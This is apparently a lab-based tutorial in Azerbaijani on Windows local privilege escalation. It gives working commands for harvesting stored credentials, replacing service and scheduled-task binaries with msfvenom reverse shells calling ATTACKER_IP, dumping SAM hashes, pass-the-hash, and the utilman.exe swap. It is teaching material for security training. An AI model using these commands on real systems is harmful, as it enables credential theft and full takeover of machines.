Local Privilege Escalation

Səlahiyyətlərin yüksəldilməsi, A istifadəçisinin hədəf sistemdəki zəifliklərdən sui-istifadə edərək B istifadəçisi kimi sistemə giriş əldə etməsindən ibarətdir. Burada B kimi qeyd etdiyim istifadəçi adətən inzibati hüquqlara malik olandır, lakin bəzi hallarda inzibati imtiyazlar əldə etmək üçün digər imtiyazsız hesablara keçməli olduğumuz vəziyyətlər olur.

Windows İstifadəçiləri

İnzibati səlahiyyətlərə malik olan istənilən istifadəçi Administrators qrupunun, standart istifadəçilər isə Users qrupunun bir hissəsidir.

Əməliyyat sistemi tərəfindən yaradılan və istifadə edilən digər istifadəçilər:

Powershell Tarixçəsi

PowerShell'də PSReadline modulu əmrlərin redaktəsi və tarixçə funksionallığına cavabdehdir. Hər hansı bir əmr yerinə yetirildikdə, bu modul onları tarix (history) faylında saxlayır. İstifadəçi əvvəllər istifadəçi adı, parol kimi həssas məlumatlardan ibarət bir əmr icra edibsə, bu fayla baxmaq səlahiyyətlərin yüksəldilməs üçün yaxşı bir yoldur. Bu fayla baxmaq üçün aşağıdakı cmd əmrini icra edə bilərsiniz:

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

%userprofile% parametri istifadəçinin profil qovluğunu göstərmək üçün istifadə olunur.

Bu əmri Powershell'də icra etmək üçün:

Get-content $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Bu nümunədə gördüyünüz kimi julia.jones istifadəçisinin parolu tarixçəyə baxaraq əldə edilə bilər.

Sistemdə saxlanılan giriş məlumatları

Aşağıdakı əmrdən istifadə edərək, kompüterdə saxlanmış etimadnamələrin(credentials) siyahısını görə bilərik.

cmdkey /list

Bu əmr əsasən, hədəf,etimadnamənin növü və etimadnamənin davamlılığı kimi məlumatlar verir. Məsələn:

Currently stored credentials:

Target: Domain:target=server1
Type: Domain Password
User: username

Bu nəticə, 'server1' adlı server üçün istifadəçi adı və şifrənin saxlanıldığını göstərir.

İndi isə aşağıdakı əmrdən istifadə edərək mike.katz üçün shell əldə edə bilərik:

runas /savecred /user:<itifadəçi-adı> cmd.exe

runas: Proqramı müxtəlif etimadnamələr ilə işə salmaq üçün istifadə olunan əmrdir.

/savecred: Bu parametr runas'a təqdim edilmiş etimadnamələri (istifadəçi adı və parol) saxlamağı əmr edir, bununl da istifadəçi hər dəfə əmri icra etdikdə onları yenidən daxil etmir.

IIS Konfiqurasiyası

İnternet Məlumat Xidmətləri (IIS) Windows serverlərində vebsaytları, veb proqramları və xidmətləri yerləşdirmək üçün Microsoft tərəfindən hazırlanmış veb server proqramıdır.IIS'də veb-saytların konfiqurasiyası web.config adlı faylda saxlanılır və burada databaza üçün parollar da saxlanıla bilər.Bu fayl 'C:\inetpub\wwwroot\web.config' və ya başqa qovluqda yerləşir.

Bu fayldan parol kimi həssas məlumatları əldə etmmək üçün onun databaza ilə əlaqəli hissələrinə baxmalıyıq. Bunun üçün aşağıdakı əmrdən istifadə edərək, nəticəni məqsədimizə uyğun olraq filterləyə bilərik.

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Bu əmr, C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config qovluğunda yerləşən faylın 'connectionString' olan hissələrini ekrana yazdırır.

Nümunədə gördüyünüz kimi, db_admin adlı istifadəçinin parolunu görmək mümkündür.

PuTTY

PuTTY açıq mənbəli terminal emulyatoru, serial konsolu və fayl transferi proqramıdır. O, SSH (Secure Shell), Telnet, rlogin və raw soket bağlantıları daxil olmaqla bir neçə şəbəkə protokolunu dəstəkləyir. PuTTY uzaq serverlər və şəbəkə cihazları ilə təhlükəsiz əlaqə yaratmaq üçün Windows əməliyyat sistemlərində geniş istifadə olunur.

PuTTY istifadəçilərə SSH parollarını saxlamağa icazə verməsə də, plaintext parollarının da olduğu proxy konfiqurasiyalarını saxlayır. Bu saxlanılmış proxy konfiqurasiyalarını əldə etmək üçün aşağıdakı əmrdən istifadə edə bilərsiniz.

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

reg query: Windows Registry'i sorğulamaq üçün istifadə edilən əmrdir.

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions: PuTTY'nin sessiya konfiqurasiyalarını saxlandığı yoldur(path).

/f "Proksi": Axtarışın "Proksi" termini olan reyestr qeydləri üçün aparılmalı olduğunu göstərir.

/s : Bu seçim, axtarışın yalnız PuTTY Sessions reyestr açarını deyil, həm də onun altındakı bütün alt açarları (alt qovluqları) ehtiva etməsini təmin edir.

Nümunədə gördüyünüz kimi, yuxarıdakı əmrdən istifadə edərək thom.smith istifadəçisinin parolunu əldə etdim.

Planlaşdırılmış Tapşırıqlar (Scheduled Tasks)

Planlaşdırılmış Tapşırıqlar, Windows əməliyyat sistemlərində istifadəçilərə hər hansı bir tapşırığın müəyyən fasilələrlə və ya xüsusi hadisələrə cavab olaraq icrasını avtomatlaşdırmağa imkan verən daxili funksiyadır. Bu tapşırıqları listələmək üçün aşağıdakı əmrdən istifadə edilə bilər:

schtasks

Daha məqsədə uyğun nəticə almaq üçün aşağıdakı əmrdən istifadə edə bilərsiniz:

schtasks /tn <task> /fo list

Bu əmr qeyd edilən taska aid məlumatları list formatında çıxaracaq.

Planlaşdırılan tapşırıqlar düzgün qurulmadıqda səlahiyyətlərin yüksəldilməsi üçün sui-istifadə edilə bilər.Əgər tapşırıq yüksək imtiyazlarla binary və ya skript idarə edirsə and həmin fayla gedən yol düzgün qorunmursa, hücumçu tərəf həmin faylın kontentini zərərli bir skriptlə dəyişə bilər(məsələn, reverse shell).

Tapşırıqda icra ediləcək faylın icazələrini görmək üçün 'icacls' alətindən istifadə edə bilərik:

# Fayl üçün Girişə Nəzarət Siyahılarını (ACL) göstərir
icacls filename.txt
# İstifadəçiyə oxumaq və icra etmək icazələri verir
icacls filename.txt /grant:r John:(RX)
# İstifadəçinin yazma icazəsini əlindən alır
icacls filename.txt /deny Jane:(W)
# İstifadəçini ACL'dən çıxarır
icacls filename.txt /remove:g Alice

Praktiki nümunə:

/v parametrindən istifadə edərək tapşırıq haqqında daha geniş məlumat alıram və bu tapşırıq zamanı icra ediləcək faylı əldə edirəm.(C:\tasks\schtask.bat)

icacls vasitəsi ilə bu faylın icazələrinə baxıram, şəkildə də gördüyünüz kimi Users'in bu fayl üçün icazələri F (Full) kimi qeyd edilib.

Fayla yazmaq icazəmiz olduğu üçün onun kontentini reverse shell faylı ilə dəyişirəm.(Bu fayl labda bizə C:\tools\nc64.exe kimi verilir)

Real nümunələrdə adətən faylı icra etmək icazəmiz olmur, amma bu nümunədə aşağıdakı əmrdən istifadə edərək icra etmək mümkündür:

schtasks /run /tn vulntask

Və əlaqə qurulur!

MSI

Windows installer faylları (.msi faylları ) sistemdə proqramları quraşdırmaq üçün istifadə olunur. Bufayllar, onu başladan istifadəçinin imtiyaz səviyyəsi ilə işləsə də daha yüksək səlahiyyətlərlə işləmək üçün konfiqurasiya edilə bilər. Bu, bizə admin səlahiyyəti ilə işləyən zərərli MSI faylı yaratmağa və icra etməyə imkan verir.

Bu metod ilə səlahiyyət yüksəldilməsi prosesini icra edə bilmək üçün iki reyestr (registry) dəyəri təyin edilməlidir (HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer və HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer)

Bu reyestrləri sorğuıamaq üçün:

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Hər iki reyestr təyin edilibsə, reverse shell faylı hazırlayaraq sistemdə icra edə bilərik:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<hücum-edənin-ip-ünvanı> LPORT=<əlaqə-qurulacaq-port> -f msi -o yusif.msi

Bu faylı hədəf sistemə yüklədikdən sonra netcat və ya Metasploit Handler ilə əlaqə üçün dinləyirik və onu icra edirik:

msiexec /quiet /qn /i C:\Windows\Temp\yusif.msi

/quiet /qn : Bu parametrlər Windows Installer'ə səssiz quraşdırma yerinə yetirməyi tapşırır, yəni quraşdırma prosesi heç bir istifadəçi interfeysi və ya göstərişlər göstərilmədən baş verir. Həm /quiet, həm də /qn eyni məqsədə xidmət edir.

/i : bu parametr quraşdırma əməliyyatının yerinə yetirilməli olduğunu göstərir.

İcra edilə bilən servislərdə icazələr düzgün təyin edilmədikdə

Windows xidmətləri Xidmət İdarəetmə Meneceri (SCM) tərfindən idarı edilir.Xidmətlər, arxa planda işləyən və əməliyyat sisteminin funksionallığını təmin edən proqramlardır. Windows'da hər bir xidmət icraedici sənədə(executable) sahib olur ki, bu, xidmət işə başladığı zaman SCM tərəfindən işə salınır.

Xidmətlər haqqında məlumat almaq üçün 'sc' (service control) alətindən istifadə edilə bilər. Bu alət, SCM ilə əlaqə qurur və bizə məlumat qaytarır. Xüsusi bir servis haqqında məlumat üçün 'query' və ya 'qc' parametrindən istifadə olunur.

sc query wuauserv
sc qc wuauserv

Xidməti başlatmaq üçün:

sc start wuauserv

Dayandırmaq üçün:

sc stop wuauserv

sc qc WindowsScheduler

Bu əmrdən istifadə edərək WindowsScheduler xidmətini sorğulayırıq və bu nəticəni əldə edirik:

Burada BINARY_PATH_NAME:C:\PROGRA2\SYSTEM1\WService.exe WindowsScheduler xidməti ilə əlaqəli olaraq icra edilən faylı gostərir. icacls alətindən istifadə edərək bu fayla yazma icazəmizin olub-olmadığını görə bilərik.

Everyone:(I)(M) o deməkdir ki, hər kəsin bu faylı dəyişdirmək icazəsi var. İndi msfvenom'dan istifadə edərək bir reverse shell hazırlayıb bu faylı dəyişdirə bilərik.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe-service -o yusif.exe

Bu faylı Windows'a yükləmək üçün ubuntuda bir http veb-serve başladıram və wget əmri ilə onu sistemə yükləyirəm:

python3 -m http.server

wget http://ATTACKER_IP:8000/yusif.exe -O yusif.exe

İndi isə aşağıdakı addımlarla faylı dəyişdirirəm:

# Faylın yerləşdiyi qovluğa keçirəm
cd C:\PROGRA~2\SYSTEM~1\

# Orijinal WService.exe faylını backup faylına köçürürəm
move WService.exe WService.exe.bkp

# Orijinal WService.exe faylını yusif.exe adlı yeni fayl ilə əvəz edirəm.
move C:\Users\thm-unpriv\yusif.exe WService.exe

# Dəyişdirilmiş WService.exe faylı üçün hər kəsə tam giriş imkanı verirəm
icacls WService.exe /grant Everyone:F

Artıq netcat alətindən istifadə edrək arxada əlaqə üçün dinləyirəm:

nc -lvnp 4444

sc ilə xidməti dayandırıb, yenidən başladıram:

sc stop windowsscheduler
sc start windowsscheduler

Və əlaqə qurulur! Indi svcusr1 kimi sistemə daxil olub, tələb olunan flag.txt faylını oxuya bilərik.

Təhlükəli Xidmət İcazələri

İstifadəsi:

accesschk64.exe -qlc <xidmətin-adı>

-q: Sakit rejimi təyin edir

-l : Obyektləri və onların xassələrini listələyir

-c : Yoxlanılacaq obyektin xidmət olduğunu göstərir

Əgər istifadəçinin xidməti konfiqurasiya edə bilmək kimi icazəsi varsa, servisin executable( icra oluna bilən) faylını reverse shell ilə dəyişə bilərik. Aşağıdakı nümunədə bu metoddan istifadə olunur:

Accesschk ilə servisin icazələrini yoxladıqda BUILTIN\Users'in SERVICE_ALL_ACCESS icazəsi olduğunu görürəm.Bu o deməkdir ki, servisi konfiqurasiya edə bilərik.

İndi msfvenom'dan istifadə edərək öz reverse shell'mi qura və onu hədəf sistemə yükləyərək əlaqə üçün dinləməyə başlaya bilərəm.

Aşağıdakı əmrdən istifadə edərək bu fayla 'hər kəs icra edə bilər' icazəsini verirəm:

icacls C:\Users\thm-unpriv\yusif.exe /grant Everyone:F

Növbəti olaraq, bu əmri cra edərək "THMService" xidmətinin executable faylını yusif.exe olaraq təyin edirəm.

sc config THMService binPath= "C:\Users\thm-unpriv\yusif.exe" obj= LocalSystem

Əlaqənin qurulması üçün xidməti başladıram:

sc start THMService

Və shell'i əldə edirəm!

Windows Səlahiyyətləri

Səlahiyyətlər, hesabın sistemlə bağlı xüsusi tapşırıqları yerinə yetirmək üçün malik olduğu hüquqlardır. Windows'da hər bir istifadəçinin səlahiyyətləri aşağıdakı əmr ilə yoxlana bilər:

whoami /priv

Bu nümunədə aşağıdakı səlahiyyətləri görürük:

SeShutdownPrivilege : İstifadəçiyə sistemi bağlamaq imkanı verir. Vəziyyəti: Disabled - Bu, imtiyazın hazırda qeyri-aktiv olduğunu bildirir. Bu imtiyazı olmayan istifadəçilər sistemi bağlaya bilmir.

SeChangeNotifyPrivilege : Serverə və ya workspace'ə traverse yoxlamasını bypass etməyə imkan verir. Traverse yoxlanışı, istifadəçinin açıq icazələri olmasa belə, bir fayl və ya qovluğa daxil olub-olmamasını müəyyən edən təhlükəsizlik tədbiridir. Vəziyyət: Enabled - Bu imtiyaz hazırda aktivdir, yəni sistem travers yoxlamasını bypass edə bilər.

SeUndock Privilege : İstifadəçiyə kompüteri dok stansiyasından çıxarmağa imkan verir. Vəziyyət: Disabled - Bu imtiyaz hazırda deaktivdir. Bu imtiyazı olmayan istifadəçilər kompüteri dok stansiyasından çıxara bilmir.

SeIncreaseWorkingSetPrivilege : Prosesin RAM-da istifadə edə biləcəyi fiziki yaddaşın miqdarı olan iş dəstinin ölçüsünü artırmağa imkan verir. Vəziyyət: Disabled - Bu imtiyaz hazırda deaktivdir. Bu imtiyaz olmadan işləyən proseslər öz iş dəstini dinamik şəkildə artıra bilməyəcək.

SeTimeZone Privilege : İstifadəçiyə sistemin saat qurşağını dəyişməyə imkan verir. Dövlət: Disabled - Bu imtiyaz hazırda deaktivdir. Bu imtiyazı olmayan istifadəçilər sistemin saat qurşağını dəyişə bilmir.

SeBackup / SeRestore

SeBackup və SeRestore səlahiyyətləri istifadəçilərə hər hansı DACL'ə məhəl qoymadan sistemdəki istənilən faylı oxumağa və yazmağa imkan verir. Bu imtiyazın arxasında duran ideya müəyyən istifadəçilərə tam inzibati imtiyazlar tələb etmədən sistemdən ehtiyat nüsxələri çıxarmağa icazə verməkdir.

Aşağıdakı nümunədə bu səlahiyyətdən istifadə edərək hücum həyata keçirəcəyik:

SAM and SYSTEM hash'lərini backup etmək üçün aşağıdakı əmrlərdən istifadə edə bilərik:

reg save hklm\system C:\Users\<backup-folder-name>\system.hive
reg save hklm\sam C:\Users\<backup-folder-name>\sam.hive

Bu faylları öz maşınımıza göndərdikdən sonra etimadnamələri çəkmək üçün Impacket alət dəstindən secretsdump.py skriptindən istifadə edə bilərik:

python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

python3.9 : Bu istifadə ediləcək Python interpreterin versiyasını təyin edir.

/opt/impacket/examples/secretsdump.py: secretsdump.py skriptinə gedən yoldur.

-sam sam.hive: SAM hive faylının yoludur

-system system.hive: SYSTEM faylına gedən yoldur

LOCAL : Bu hədəf sistem və ya domendir. Bu halda, local maşından etimadnamələrin dump edildiyini göstərir.

İndi, Windows maşınından administrator kimi shell əldə etmək üçün Pass-the-Hash hücumu həyata keçirəcəyik. Bunun üçün Impacket alətlər dəstindəki psexec.py skriptindən istifadə edirik:

python3.9 /opt/impacket/examples/psexec.py -hashes <hash-dəyəri> administrator@<maşının-ip-ünvanı>

Və shell'i əldə edirik!

SeTakeOwnership Səlahiyyəti

SeTakeOwnership səlahiyyətiı istifadəçiyə sistemdəki istənilən obyektə,faylla və reyestr açarlarına sahib olmağa imkan verir və hücumçuya imtiyazları yüksəltmək üçün bir çox imkanlar verir. Məsələn, SYSTEM kimi işləyən bir xidməti axtarıb, həmin xidmətin executable faylının sahibliyini götürə bilərik.

Aşağıdakı nümunədə utilman.exe faylından istifadə edəcəyik. Utilman.exe (Utility Manager) sistem əlçatanlıq aləti olan Utility Manager proqramını işə salan Windows'da icra edilə bilən faylıdır.Utilman SYSTEM imtiyazları ilə işlədiyindən, orijinal binary faylını öz payload'ımızla əvəz edib, sistem imtiyazları əldə edə bilərik. Amma SeTakeOwnership Səlahiyyəti ilə istədiyimiz faylın sahibi ola bildiyimiz üçün onu əvəz etmək bu vəziyyətdə mənasızdır.

Faylın sahibliyini əldə etmək üçün takeown alətindən istifadə edə bilərik:

takeown /f <faylın-adı>

Faylın sahibi olmaq onun üçün bütün imtiyazlara sahib olmağı ifadə etmir, amma biz sahib kimi özümüzə icazələr verə bilərik:

icacls <faylın-adı> /grant <İstifadəçi>:F

Daha sonra utilman.exe faylını cmd.exe faylının surəti ilə əvəz edirik:

copy cmd.exe utilman.exe

Utilman.exe faylını işə salmaq üçün hesabı kilidləyirik və "Ease of Access"'dən istifadə edirik, hansı ki, utilman.exe faylını SYSTEM səlahiyyəti ilə işə salır. Biz bu faylı cmd.exe nüsxəsi ilə əvəz etdiyimiz üçün SYSTEM imtiyazları ilə cmd əldə edirik.

PASS-the-Hash

Hash əldə edilibsə onu qırmağa ehtiyac yoxdur, hash'dən istifadə edərək autentifikasiya etmək mümkündür. Bunun üçün aşağıdakı əmrdən sitifadə edə bilərsiniz:

pth-winexe -U 'DOMAIN/username%hash' //MACHINE_IP 'command'
pth-winexe -U 'WORKGROUP/admin%hash' //MACHINE_IP cmd.exe

Bu əmrlərdə pth-winexe aləti pass-the-hash (PTH) autentifikasiyasından istifadə edərək uzaq Windows maşınına autentifikasiya edir.

Windows Privilege Escalation haqqında daha çox məlumat üçün aşağıdakı keçidlərə baxa bilərsiniz:

• ⚠️ Yalnız Windows Server 2016 və Windows 10 1803 yamasına qədər işləyir

• ⚠️ Yalnız Windows Server 2016 və Windows 10 1803 yamasına qədər işləyir

• 🙏 Windows Server 2019 və Windows 10 üçün işləyir

• 🙏 Windows Server 2019 və Windows 10 üçün işləyir